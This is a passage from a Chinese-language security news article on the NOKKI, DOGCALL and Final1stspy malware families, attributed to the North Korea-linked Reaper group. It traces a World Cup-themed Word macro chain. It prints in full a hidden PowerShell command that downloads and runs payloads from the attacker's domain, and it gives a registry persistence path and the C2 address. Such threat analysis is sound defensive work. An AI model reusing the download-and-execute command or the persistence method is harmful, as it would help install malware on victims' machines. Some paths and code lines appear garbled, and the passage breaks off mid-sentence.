最新發現！NOKKI惡意軟體與朝鮮Reaper組織有關

新聞 10-03

最近，unit 42研究人員發現了NOKKI惡意軟體家族，主要攻擊目標是說俄語和柬埔寨語的地區。經過分析發現該惡意軟體攻擊活動與Reaper組織有關。

其他安全公司的分析結果顯示Reaper組織與朝鮮有關，主要攻擊朝鮮關注的國家和組織，包括韓國的軍事和國防工業、與朝鮮有生意往來的中東企業等。該組織的常用手法包括使用定製的惡意軟體家族——DOGCALL。DOGCALL是一款遠程訪問木馬（RAT），使用第三方主機服務來上傳數據和接受命令。

本文主要分析NOKKI惡意軟體與DOGCALL惡意軟體家族的關係，以及與應用DOGCALL的惡意軟體家族的相關信息，研究人員根據惡意軟體中的pdb字元串將其名命名為Final1stspy。

惡意宏

在分析NOKKI惡意軟體時，unit 42研究人員發現從2018年7月開始的一系列攻擊活動都使用了word文檔中的惡意宏。這些宏本質上並不複雜，而且只嘗試執行：

·下載和運行可執行惡意軟體payload；

·下載和打開word誘餌文檔。

為了避免被檢測到，惡意宏使用了簡單的字元串混淆技術——base64編碼。不同的是，惡意軟體首先將base64編碼的文本變成十六進位，然後再將十六進位轉換為文本字元串。

圖1 下載和執行遠程payload的惡意宏文件

圖2 應用反混淆方法的惡意宏文件

通過搜索傳播NOKKI樣本的反混淆技術，研究人員發現另一個文件。該文件有以下特徵：

基於原始文件名，可用推測該惡意軟體樣本的攻擊目標是對2018年俄羅斯事世界盃感興趣的人。從下圖可用看出，樣本之間的反混淆方法和作者的注釋都是相同的：

圖3 NOKKI dropper與World Cup predictions dropper的相似處

雖然反混淆方法是相同的，但宏文件的真實共那個有所不同。NOKKI dropper樣本會下載payload和誘餌文件，而World Cup predictions惡意軟體樣本會下載和執行一個封裝再HTML中的遠程VB腳本文件，並把文本加入到原始word文檔之後來引誘受害者。

誘餌文件含有來自英國ESPN網站文章的公開內容：

World Cup predictions.doc文件的執行鏈完成後，受害者機器上會執行一個DOGCALL惡意軟體樣本。

惡意軟體使用的評論誘餌和payload正說明了DOGCALL屬於Reaper，隸屬朝鮮的威脅單元。

惡意軟體執行

World Cup predictions.doc運行後，會繼續從下面的鏈接下載VBScript文件：

http://kmbr1.nitesbr1[.]org/UserFiles/File/image/home.html

VBScript文件使用的反混淆方法與前面描述的完全相同。當第二階段VBScript文件執行時，會將數據1111:rom*E8FEF0CDF6C1EBBA90794B2B寫入%APPDATA%Microsoftmib.dat。該文件之後會被Final1stspy惡意軟體家族使用。

該文件寫入後，會執行下面的命令：

objShell.Run "cmd.exe /k powershell.exe" & " " & "-windowstyle" & " " & "hidden" & " " & "-ExecutionPolicy Bypass" & " " & "$h="%APPDATA%/Microsoft/Windows/msvcrt32.dll"" & ";" & "$f="%APPDATA%/Microsoft/ieConv.exe"" & ";" & "$x="" & "http://" & "kmbr1.nitesbr1.org" & "/UserFiles/File/image/images/happy.jpg" & "";" & "$t="" & "http://" & "kmbr1.nitesbr1[.]org" & "/UserFiles/File/image/images/wwwtest.jpg" & "";" & "(" & "New-Object System.Net.WebClient" & ")" & ".DownloadFile($t,$f)" & ";" & "(" & "New-Object System.Net.WebClient" & ")" & ".DownloadFile($x,$h)" & ";" & "Start-Process $f" & ";" & "Stop-Process" & " " & "-processname" & " " & "cmd", 0

代碼執行後會下載兩個文件：http:// kmbr1.nitesbr1[.]org/UserFiles/File/images/happy.jpg和http:// kmbr1.nitesbr1[.]org/UserFiles/File/images/wwwtest.jpg，並保存在 %APPDATA%/Microsoft/Windows/msvcrt32.dll和%APPDATA%/Microsoft/ieConv.exe。最後，VBScript文件會在新進程中執行之前下載的ieConv.exe文件。

這兩個文件是之前未報告的dropper惡意軟體家族Final1stspy的實例。

Final1stspy

Final1stspy惡意軟體家族可用分為可執行文件和DLL。這些文件有下面的特徵：

所有樣本都是幾周內編譯的。另外，用來傳播惡意軟體的原始word文檔的最後修改時間就是DLL編譯前幾天。

可執行文件和DLL都用了特定的路徑來混淆重要的字元串。下面的python代碼是用來解碼字元串的：

import base64 data = "[Obfuscated String]"dataDecoded = b64decode(data)outVar = ""for char in dataDecoded:outVar += chr(((ord(char) + 122) ^ 0x19) & 0xff)print(outVar)

Final1stspy惡意軟體開始時會尋找是否存在下面的文件：

·%APPDATA%MicrosoftWindowsmsvcrt64.dll

如果文件存在，惡意軟體會載入DLL並嘗試調用main_func函數。

如果文件不存在，惡意軟體會尋找下面的文件：

·%APPDATA%MicrosoftWindowsmsvcrt32.dll

如果文件存在，惡意軟體會0x50對文件進行XOR解密，並寫入前面提到的msvcrt64.dll路徑，並載入main_func函數。

DLL使用的字元串混淆方法與可執行文件中的相同。首先會收集基本的系統信息，必能通過設置指向%APPDATA%/Microsoft/ieConv.exe的註冊表來確保駐留：

HKCUSoftwareMicrosoftWindowsCurrentVersionRun
undll32

Final1stspy惡意軟體家族會繼續對之前的mib.dat文件進行閱讀和語法分析。分析的數據會被用於之後的HTTP GET請求，表示Index、 Account、Group變數。

Final1stspy可用讀取%APPDATA%/Microsoft/olevnc.ini文件，該文件中有許多變數，包括用戶代理、URL、埠、內部計數器。如果文件不存在，惡意軟體會用硬編碼的用戶代理和URL。特定的樣本會與http://kmbr1.nitesbr1[.]org/UserFiles/File/image/index.php進行通信，使用的用戶代理為Host Process Update。

惡意軟體會繼續向該URL發送HTTP GET請求，示例如下：